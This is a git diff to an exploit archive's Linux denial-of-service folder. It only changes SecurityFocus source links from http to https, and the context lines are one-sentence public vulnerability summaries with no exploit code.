a/exploits/linux/dos/33020.py +++ b/exploits/linux/dos/33020.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35169/info +source: https://www.securityfocus.com/bid/35169/info CUPS is prone to a denial-of-service vulnerability because of a NULL-pointer dereference that occurs when processing two consecutive IPP_TAG_UNSUPPORTED tags in specially crafted IPP (Internet Printing Protocal) packets. diff --git a/exploits/linux/dos/33031.html b/exploits/linux/dos/33031.html index 9d8202f62..6bde26b62 100644 --- a/exploits/linux/dos/33031.html +++ b/exploits/linux/dos/33031.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35280/info +source: https://www.securityfocus.com/bid/35280/info Mozilla Firefox is prone to a remote denial-of-service vulnerability. 
diff --git a/exploits/linux/dos/33036.txt b/exploits/linux/dos/33036.txt index 72803cc96..573b34da0 100644 --- a/exploits/linux/dos/33036.txt +++ b/exploits/linux/dos/33036.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35338/info +source: https://www.securityfocus.com/bid/35338/info Git is prone to a denial-of-service vulnerability because it fails to properly handle some client requests. diff --git a/exploits/linux/dos/33040.txt b/exploits/linux/dos/33040.txt index 4c96c90f2..5c42eeb8e 100644 --- a/exploits/linux/dos/33040.txt +++ b/exploits/linux/dos/33040.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35390/info +source: https://www.securityfocus.com/bid/35390/info GUPnP is prone to a vulnerability that remote attackers may exploit to cause denial-of-service conditions. diff --git a/exploits/linux/dos/33041.txt b/exploits/linux/dos/33041.txt index 04849d3f2..ac9722335 100644 --- a/exploits/linux/dos/33041.txt +++ b/exploits/linux/dos/33041.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35399/info +source: https://www.securityfocus.com/bid/35399/info Irssi is prone to an off-by-one, heap-based, memory-corruption vulnerability because it fails to properly bounds-check user-supplied data before copying it into a memory buffer. diff --git a/exploits/linux/dos/33042.txt b/exploits/linux/dos/33042.txt index fc5896cec..573217418 100644 --- a/exploits/linux/dos/33042.txt +++ b/exploits/linux/dos/33042.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35413/info +source: https://www.securityfocus.com/bid/35413/info Mozilla Firefox is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/33043.txt b/exploits/linux/dos/33043.txt index 00326ad0e..3eb8a1371 100644 --- a/exploits/linux/dos/33043.txt +++ b/exploits/linux/dos/33043.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35415/info +source: https://www.securityfocus.com/bid/35415/info The Linux kernel is prone to a local denial-of-service vulnerability that attackers can exploit to cause an affected computer to crash. diff --git a/exploits/linux/dos/33049.txt b/exploits/linux/dos/33049.txt index 864b433a6..93bb732d3 100644 --- a/exploits/linux/dos/33049.txt +++ b/exploits/linux/dos/33049.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35451/info +source: https://www.securityfocus.com/bid/35451/info LibTIFF is prone to a remote buffer-underflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/33077.c b/exploits/linux/dos/33077.c index 9dcb3e402..46723d907 100644 --- a/exploits/linux/dos/33077.c +++ b/exploits/linux/dos/33077.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35609/info +// source: https://www.securityfocus.com/bid/35609/info MySQL is prone to multiple format-string vulnerabilities. diff --git a/exploits/linux/dos/33088.txt b/exploits/linux/dos/33088.txt index 13c0b0fb0..e3ccf6f9b 100644 --- a/exploits/linux/dos/33088.txt +++ b/exploits/linux/dos/33088.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35724/info +source: https://www.securityfocus.com/bid/35724/info The Linux kernel is prone to a local NULL-pointer dereference vulnerability. diff --git a/exploits/linux/dos/33101.txt b/exploits/linux/dos/33101.txt index 7a1c8e10e..4e50d4097 100644 --- a/exploits/linux/dos/33101.txt +++ b/exploits/linux/dos/33101.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35775/info +source: https://www.securityfocus.com/bid/35775/info Mozilla Firefox and Thunderbird are prone to a remote memory-corruption vulnerability that attackers can exploit to cause denial-of-service conditions and possibly execute arbitrary code. 
diff --git a/exploits/linux/dos/33134.txt b/exploits/linux/dos/33134.txt index 3ac7f8f93..c1848a4d9 100644 --- a/exploits/linux/dos/33134.txt +++ b/exploits/linux/dos/33134.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35907/info +source: https://www.securityfocus.com/bid/35907/info Adobe Flash Player and Adobe AIR are prone to an integer-overflow vulnerability. diff --git a/exploits/linux/dos/33148.c b/exploits/linux/dos/33148.c index 5a71a045e..b9dc94212 100644 --- a/exploits/linux/dos/33148.c +++ b/exploits/linux/dos/33148.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/35976/info +source: https://www.securityfocus.com/bid/35976/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/33176.rb b/exploits/linux/dos/33176.rb index ba01eb0ee..c75c3f7f8 100755 --- a/exploits/linux/dos/33176.rb +++ b/exploits/linux/dos/33176.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36074/info +source: https://www.securityfocus.com/bid/36074/info The 'ntop' tool is prone to a denial-of-service vulnerability because of a NULL-pointer dereference that occurs when crafted HTTP Basic Authentication credentials are received by the embedded webserver. diff --git a/exploits/linux/dos/33193.c b/exploits/linux/dos/33193.c index 2bd6fdeaf..de2e1a405 100644 --- a/exploits/linux/dos/33193.c +++ b/exploits/linux/dos/33193.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/36191/info +source: https://www.securityfocus.com/bid/36191/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/33222.txt b/exploits/linux/dos/33222.txt index 93359ab32..dd6f1e72d 100644 --- a/exploits/linux/dos/33222.txt +++ b/exploits/linux/dos/33222.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36408/info +source: https://www.securityfocus.com/bid/36408/info Wireshark is prone to multiple denial-of-service vulnerabilities. 
diff --git a/exploits/linux/dos/33223.txt b/exploits/linux/dos/33223.txt index 613daf367..748583b54 100644 --- a/exploits/linux/dos/33223.txt +++ b/exploits/linux/dos/33223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36408/info +source: https://www.securityfocus.com/bid/36408/info Wireshark is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/33224.txt b/exploits/linux/dos/33224.txt index 979dbb60d..e389ca8af 100644 --- a/exploits/linux/dos/33224.txt +++ b/exploits/linux/dos/33224.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36408/info +source: https://www.securityfocus.com/bid/36408/info Wireshark is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/33228.txt b/exploits/linux/dos/33228.txt index 0f3ca11f2..e4b3a3948 100644 --- a/exploits/linux/dos/33228.txt +++ b/exploits/linux/dos/33228.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36423/info +source: https://www.securityfocus.com/bid/36423/info The Linux kernel is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/33230.txt b/exploits/linux/dos/33230.txt index 258f8328d..c03cefcc6 100644 --- a/exploits/linux/dos/33230.txt +++ b/exploits/linux/dos/33230.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36443/info +source: https://www.securityfocus.com/bid/36443/info GNU glibc is prone to an integer-overflow weakness. diff --git a/exploits/linux/dos/33233.txt b/exploits/linux/dos/33233.txt index 663f96ea0..b8c44de13 100644 --- a/exploits/linux/dos/33233.txt +++ b/exploits/linux/dos/33233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36465/info +source: https://www.securityfocus.com/bid/36465/info FFmpeg is prone to multiple remote vulnerabilities. diff --git a/exploits/linux/dos/33269.txt b/exploits/linux/dos/33269.txt index 95cc4e4c8..961a3db8d 100644 
--- a/exploits/linux/dos/33269.txt +++ b/exploits/linux/dos/33269.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36606/info +source: https://www.securityfocus.com/bid/36606/info Dopewars is prone to a denial-of-service vulnerability that affects the server part of the application. diff --git a/exploits/linux/dos/33283.txt b/exploits/linux/dos/33283.txt index a73013991..f6f90226e 100644 --- a/exploits/linux/dos/33283.txt +++ b/exploits/linux/dos/33283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36668/info +source: https://www.securityfocus.com/bid/36668/info Adobe Reader and Acrobat are prone to a remote code-execution vulnerability because they fail to properly handle certain COM objects. diff --git a/exploits/linux/dos/33289.txt b/exploits/linux/dos/33289.txt index ee765c6bf..70af293cb 100644 --- a/exploits/linux/dos/33289.txt +++ b/exploits/linux/dos/33289.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36706/info +source: https://www.securityfocus.com/bid/36706/info The Linux kernel is prone to a local denial-of-service vulnerability that attackers can exploit to cause an affected computer to panic. diff --git a/exploits/linux/dos/33306.txt b/exploits/linux/dos/33306.txt index 1a9b83ab4..549d166cf 100644 --- a/exploits/linux/dos/33306.txt +++ b/exploits/linux/dos/33306.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36795/info +source: https://www.securityfocus.com/bid/36795/info Snort is prone to multiple denial-of-service vulnerabilities because the application fails to properly process specially crafted IPv6 packets. diff --git a/exploits/linux/dos/33312.txt b/exploits/linux/dos/33312.txt index 0a84a49f1..8d24af7d8 100644 --- a/exploits/linux/dos/33312.txt +++ b/exploits/linux/dos/33312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36851/info +source: https://www.securityfocus.com/bid/36851/info Mozilla Firefox is prone to a heap-based buffer-overflow vulnerability. 
diff --git a/exploits/linux/dos/33314.html b/exploits/linux/dos/33314.html index 3f928f14e..f5ffe61f4 100644 --- a/exploits/linux/dos/33314.html +++ b/exploits/linux/dos/33314.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36866/info +source: https://www.securityfocus.com/bid/36866/info Mozilla Firefox is prone to a remote memory-corruption vulnerability. diff --git a/exploits/linux/dos/33397.txt b/exploits/linux/dos/33397.txt index e21f70e6c..7f8e2c005 100644 --- a/exploits/linux/dos/33397.txt +++ b/exploits/linux/dos/33397.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37297/info +source: https://www.securityfocus.com/bid/37297/info MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions. diff --git a/exploits/linux/dos/33398.txt b/exploits/linux/dos/33398.txt index 233d4e184..35b913b2f 100644 --- a/exploits/linux/dos/33398.txt +++ b/exploits/linux/dos/33398.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37297/info +source: https://www.securityfocus.com/bid/37297/info MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions. diff --git a/exploits/linux/dos/33480.txt b/exploits/linux/dos/33480.txt index c23460175..1187ed160 100644 --- a/exploits/linux/dos/33480.txt +++ b/exploits/linux/dos/33480.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37688/info +source: https://www.securityfocus.com/bid/37688/info MATLAB is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index. diff --git a/exploits/linux/dos/33524.txt b/exploits/linux/dos/33524.txt index e9c1a3140..fa2ba36e5 100644 --- a/exploits/linux/dos/33524.txt +++ b/exploits/linux/dos/33524.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37807/info +source: https://www.securityfocus.com/bid/37807/info OpenOffice is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/33549.txt b/exploits/linux/dos/33549.txt index a06f57089..e448d5fd5 100644 --- a/exploits/linux/dos/33549.txt +++ b/exploits/linux/dos/33549.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37857/info +source: https://www.securityfocus.com/bid/37857/info OpenOffice is prone to a remote denial-of-service vulnerability caused by a NULL-pointer dereference. diff --git a/exploits/linux/dos/33571.txt b/exploits/linux/dos/33571.txt index 6e618f055..5cf3c20c5 100644 --- a/exploits/linux/dos/33571.txt +++ b/exploits/linux/dos/33571.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37973/info +source: https://www.securityfocus.com/bid/37973/info PostgreSQL is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/33581.txt b/exploits/linux/dos/33581.txt index 609990b12..2262a3d3b 100644 --- a/exploits/linux/dos/33581.txt +++ b/exploits/linux/dos/33581.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38006/info +source: https://www.securityfocus.com/bid/38006/info Hybserv2 is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/33591.sh b/exploits/linux/dos/33591.sh index 3ded71125..f6905b114 100755 --- a/exploits/linux/dos/33591.sh +++ b/exploits/linux/dos/33591.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38036/info +source: https://www.securityfocus.com/bid/38036/info The 'lighttpd' webserver is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/33592.txt b/exploits/linux/dos/33592.txt index 267b0b193..4f399d383 100644 --- a/exploits/linux/dos/33592.txt +++ b/exploits/linux/dos/33592.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38038/info +source: https://www.securityfocus.com/bid/38038/info The Linux kernel is prone to a local denial-of-service vulnerability that affects the Kernel-based Virtual Machine (KVM). diff --git a/exploits/linux/dos/33635.c b/exploits/linux/dos/33635.c index 60ac0f329..6afbc0e41 100644 --- a/exploits/linux/dos/33635.c +++ b/exploits/linux/dos/33635.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/38185/info +source: https://www.securityfocus.com/bid/38185/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/33672.txt b/exploits/linux/dos/33672.txt index 28f1e7f86..49ed21c9a 100644 --- a/exploits/linux/dos/33672.txt +++ b/exploits/linux/dos/33672.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38395/info +source: https://www.securityfocus.com/bid/38395/info Kojoney is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/33801.txt b/exploits/linux/dos/33801.txt index 99639100f..36b142e9c 100644 --- a/exploits/linux/dos/33801.txt +++ b/exploits/linux/dos/33801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38944/info +source: https://www.securityfocus.com/bid/38944/info Mozilla Firefox, Thunderbird and Seamonkey are prone to multiple remote memory-corruption vulnerabilities. diff --git a/exploits/linux/dos/33850.txt b/exploits/linux/dos/33850.txt index deab3e9a2..ba30d2d98 100644 --- a/exploits/linux/dos/33850.txt +++ b/exploits/linux/dos/33850.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39577/info +source: https://www.securityfocus.com/bid/39577/info memcached is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/33886.txt b/exploits/linux/dos/33886.txt index 9128c29eb..40ab21cf5 100644 --- a/exploits/linux/dos/33886.txt +++ b/exploits/linux/dos/33886.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39719/info +source: https://www.securityfocus.com/bid/39719/info The Linux kernel is prone to a local memory-corruption vulnerability. diff --git a/exploits/linux/dos/33965.txt b/exploits/linux/dos/33965.txt index 6ce5960d3..18c70e520 100644 --- a/exploits/linux/dos/33965.txt +++ b/exploits/linux/dos/33965.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40009/info +source: https://www.securityfocus.com/bid/40009/info Geo++ GNCASTER is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/33966.rb b/exploits/linux/dos/33966.rb index 1766be466..c3764b82a 100755 --- a/exploits/linux/dos/33966.rb +++ b/exploits/linux/dos/33966.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40015/info +source: https://www.securityfocus.com/bid/40015/info Geo++ GNCASTER is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/34228.txt b/exploits/linux/dos/34228.txt index b02019d82..4d086bd9f 100644 --- a/exploits/linux/dos/34228.txt +++ b/exploits/linux/dos/34228.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41251/info +source: https://www.securityfocus.com/bid/41251/info Mumble Murmur is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/34249.txt b/exploits/linux/dos/34249.txt index b598bb608..894ccde44 100644 --- a/exploits/linux/dos/34249.txt +++ b/exploits/linux/dos/34249.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41352/info +source: https://www.securityfocus.com/bid/41352/info Freeciv is prone to multiple remote denial-of-service vulnerabilities because the application fails to properly handle specially crafted network packets. diff --git a/exploits/linux/dos/34278.txt b/exploits/linux/dos/34278.txt index 1028725d5..ed3e0792e 100644 --- a/exploits/linux/dos/34278.txt +++ b/exploits/linux/dos/34278.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41475/info +source: https://www.securityfocus.com/bid/41475/info LibTIFF is prone to a denial-of-service vulnerability because it fails to properly validate user-supplied input. diff --git a/exploits/linux/dos/34279.txt b/exploits/linux/dos/34279.txt index 9304dbf33..f296c4515 100644 --- a/exploits/linux/dos/34279.txt +++ b/exploits/linux/dos/34279.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41477/info +source: https://www.securityfocus.com/bid/41477/info LibTIFF is prone to a denial-of-service vulnerability because it fails to properly validate user-supplied input. diff --git a/exploits/linux/dos/34348.txt b/exploits/linux/dos/34348.txt index f90929f31..66c618198 100644 --- a/exploits/linux/dos/34348.txt +++ b/exploits/linux/dos/34348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41770/info +source: https://www.securityfocus.com/bid/41770/info OpenLDAP is prone to multiple vulnerabilities. diff --git a/exploits/linux/dos/34356.txt b/exploits/linux/dos/34356.txt index ed3d49042..519caabd3 100644 --- a/exploits/linux/dos/34356.txt +++ b/exploits/linux/dos/34356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41801/info +source: https://www.securityfocus.com/bid/41801/info gif2png is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/dos/34364.html b/exploits/linux/dos/34364.html index ec26b177c..219db2d0f 100644 --- a/exploits/linux/dos/34364.html +++ b/exploits/linux/dos/34364.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41873/info +source: https://www.securityfocus.com/bid/41873/info Qt is prone to a remote memory-corruption vulnerability. diff --git a/exploits/linux/dos/34375.txt b/exploits/linux/dos/34375.txt index f4fe528a2..d96039a69 100644 --- a/exploits/linux/dos/34375.txt +++ b/exploits/linux/dos/34375.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41965/info +source: https://www.securityfocus.com/bid/41965/info sSMTP is prone to a remote buffer-overflow vulnerability. diff --git a/exploits/linux/dos/34427.txt b/exploits/linux/dos/34427.txt index 8d0c96831..4f6cdd6fc 100644 --- a/exploits/linux/dos/34427.txt +++ b/exploits/linux/dos/34427.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42306/info +source: https://www.securityfocus.com/bid/42306/info OpenSSL is prone to a remote memory-corruption vulnerability. diff --git a/exploits/linux/dos/34506.txt b/exploits/linux/dos/34506.txt index e0c6dfbf1..be1638c15 100644 --- a/exploits/linux/dos/34506.txt +++ b/exploits/linux/dos/34506.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42599/info +source: https://www.securityfocus.com/bid/42599/info MySQL is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/34510.txt b/exploits/linux/dos/34510.txt index e916dfbac..f37b11108 100644 --- a/exploits/linux/dos/34510.txt +++ b/exploits/linux/dos/34510.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42625/info +source: https://www.securityfocus.com/bid/42625/info MySQL is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/34520.txt b/exploits/linux/dos/34520.txt index 4243c3da7..8b8bb2eb5 100644 --- a/exploits/linux/dos/34520.txt +++ b/exploits/linux/dos/34520.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42633/info +source: https://www.securityfocus.com/bid/42633/info MySQL is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/34521.txt b/exploits/linux/dos/34521.txt index 72fca3447..fdb3a4fb7 100644 --- a/exploits/linux/dos/34521.txt +++ b/exploits/linux/dos/34521.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42638/info +source: https://www.securityfocus.com/bid/42638/info MySQL is prone to a denial-of-service vulnerability. 
diff --git a/exploits/linux/dos/34522.txt b/exploits/linux/dos/34522.txt index c0bedb913..b5ce859cb 100644 --- a/exploits/linux/dos/34522.txt +++ b/exploits/linux/dos/34522.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42643/info +source: https://www.securityfocus.com/bid/42643/info MySQL is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/34953.txt b/exploits/linux/dos/34953.txt index 9ce8a7c60..f6f40ba9b 100644 --- a/exploits/linux/dos/34953.txt +++ b/exploits/linux/dos/34953.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44623/info +source: https://www.securityfocus.com/bid/44623/info http://www.halfdog.net/Security/FuseTimerace/ FUSE fusermount tool is prone to a race-condition vulnerability. diff --git a/exploits/linux/dos/35013.c b/exploits/linux/dos/35013.c index a3dc5e336..38274f0e7 100644 --- a/exploits/linux/dos/35013.c +++ b/exploits/linux/dos/35013.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/45036/info +source: https://www.securityfocus.com/bid/45036/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/35061.c b/exploits/linux/dos/35061.c index 98d1a4149..baab19eb9 100644 --- a/exploits/linux/dos/35061.c +++ b/exploits/linux/dos/35061.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45233/info +// source: https://www.securityfocus.com/bid/45233/info GNU glibc is prone to a denial-of-service vulnerability due to stack exhaustion. diff --git a/exploits/linux/dos/35162.cob b/exploits/linux/dos/35162.cob index 92d9d8c77..4856bbfc9 100644 --- a/exploits/linux/dos/35162.cob +++ b/exploits/linux/dos/35162.cob @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45647/info +source: https://www.securityfocus.com/bid/45647/info GIMP is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate checks on user-supplied input. 
diff --git a/exploits/linux/dos/35240.c b/exploits/linux/dos/35240.c index 3e5fb073f..805181a69 100644 --- a/exploits/linux/dos/35240.c +++ b/exploits/linux/dos/35240.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45915/info +// source: https://www.securityfocus.com/bid/45915/info The 'acpid' daemon is prone to multiple local denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/35403.c b/exploits/linux/dos/35403.c index 04ebcb813..29cacd822 100644 --- a/exploits/linux/dos/35403.c +++ b/exploits/linux/dos/35403.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/46630/info +source: https://www.securityfocus.com/bid/46630/info The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/35404.c b/exploits/linux/dos/35404.c index 7f95803e1..68b2b6e02 100644 --- a/exploits/linux/dos/35404.c +++ b/exploits/linux/dos/35404.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/46630/info +source: https://www.securityfocus.com/bid/46630/info The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/35432.txt b/exploits/linux/dos/35432.txt index 977fb3750..35db6d2f0 100644 --- a/exploits/linux/dos/35432.txt +++ b/exploits/linux/dos/35432.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46796/info +source: https://www.securityfocus.com/bid/46796/info Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer dereference error. diff --git a/exploits/linux/dos/35445.txt b/exploits/linux/dos/35445.txt index f8fc8ebea..42bed6269 100644 --- a/exploits/linux/dos/35445.txt +++ b/exploits/linux/dos/35445.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46831/info +source: https://www.securityfocus.com/bid/46831/info OpenLDAP is prone to a remote denial-of-service vulnerability that affects the 'modify relative distinguished name' (modrdn) command. 
diff --git a/exploits/linux/dos/35478.txt b/exploits/linux/dos/35478.txt index c7dea8058..e000932f8 100644 --- a/exploits/linux/dos/35478.txt +++ b/exploits/linux/dos/35478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46923/info +source: https://www.securityfocus.com/bid/46923/info MHonArc is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/35600.c b/exploits/linux/dos/35600.c index 12850cbfc..097542861 100644 --- a/exploits/linux/dos/35600.c +++ b/exploits/linux/dos/35600.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/47296/info +source: https://www.securityfocus.com/bid/47296/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/35738.php b/exploits/linux/dos/35738.php index ed35fdce0..db891d2e0 100644 --- a/exploits/linux/dos/35738.php +++ b/exploits/linux/dos/35738.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47820/info +source: https://www.securityfocus.com/bid/47820/info Apache APR is prone to a vulnerability that may allow attackers to cause a denial-of-service condition. diff --git a/exploits/linux/dos/35820.c b/exploits/linux/dos/35820.c index f88fe7144..459d699af 100644 --- a/exploits/linux/dos/35820.c +++ b/exploits/linux/dos/35820.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/48101/info +source: https://www.securityfocus.com/bid/48101/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/35957.txt b/exploits/linux/dos/35957.txt index cfd04d64f..4a8c84907 100644 --- a/exploits/linux/dos/35957.txt +++ b/exploits/linux/dos/35957.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48687/info +source: https://www.securityfocus.com/bid/48687/info The Auerswald USB Device Driver for the Linux kernel is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. 
diff --git a/exploits/linux/dos/36404.c b/exploits/linux/dos/36404.c index c34a4f969..ae0542b40 100644 --- a/exploits/linux/dos/36404.c +++ b/exploits/linux/dos/36404.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50898/info +// source: https://www.securityfocus.com/bid/50898/info GNU glibc is prone to an remote integer-overflow vulnerability. diff --git a/exploits/linux/dos/36425.txt b/exploits/linux/dos/36425.txt index 12248090f..8382f4af3 100644 --- a/exploits/linux/dos/36425.txt +++ b/exploits/linux/dos/36425.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50938/info +source: https://www.securityfocus.com/bid/50938/info The Linux kernel is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/36545.txt b/exploits/linux/dos/36545.txt index 41ba2fbcb..d6133165e 100644 --- a/exploits/linux/dos/36545.txt +++ b/exploits/linux/dos/36545.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51389/info +source: https://www.securityfocus.com/bid/51389/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/36633.txt b/exploits/linux/dos/36633.txt index d8854411d..57c70d808 100644 --- a/exploits/linux/dos/36633.txt +++ b/exploits/linux/dos/36633.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51710/info +source: https://www.securityfocus.com/bid/51710/info Wireshark is prone to a buffer-underflow vulnerability and multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/36669.txt b/exploits/linux/dos/36669.txt index 321af1351..959cbb9dc 100644 --- a/exploits/linux/dos/36669.txt +++ b/exploits/linux/dos/36669.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51917/info +source: https://www.securityfocus.com/bid/51917/info Apache APR is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/37036.txt b/exploits/linux/dos/37036.txt index f4d9e17fb..85a8510fc 100644 
--- a/exploits/linux/dos/37036.txt +++ b/exploits/linux/dos/37036.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52856/info +source: https://www.securityfocus.com/bid/52856/info Flock is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/37306.txt b/exploits/linux/dos/37306.txt index 97d73c3db..8d121208d 100644 --- a/exploits/linux/dos/37306.txt +++ b/exploits/linux/dos/37306.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53646/info +source: https://www.securityfocus.com/bid/53646/info Mosh is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/37477.txt b/exploits/linux/dos/37477.txt index b6d8e804a..59e7e2107 100644 --- a/exploits/linux/dos/37477.txt +++ b/exploits/linux/dos/37477.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54281/info +source: https://www.securityfocus.com/bid/54281/info VTE is prone to a vulnerability that may allow attackers to cause an affected application to consume excessive amounts of memory and CPU time, resulting in a denial-of-service condition. diff --git a/exploits/linux/dos/37538.py 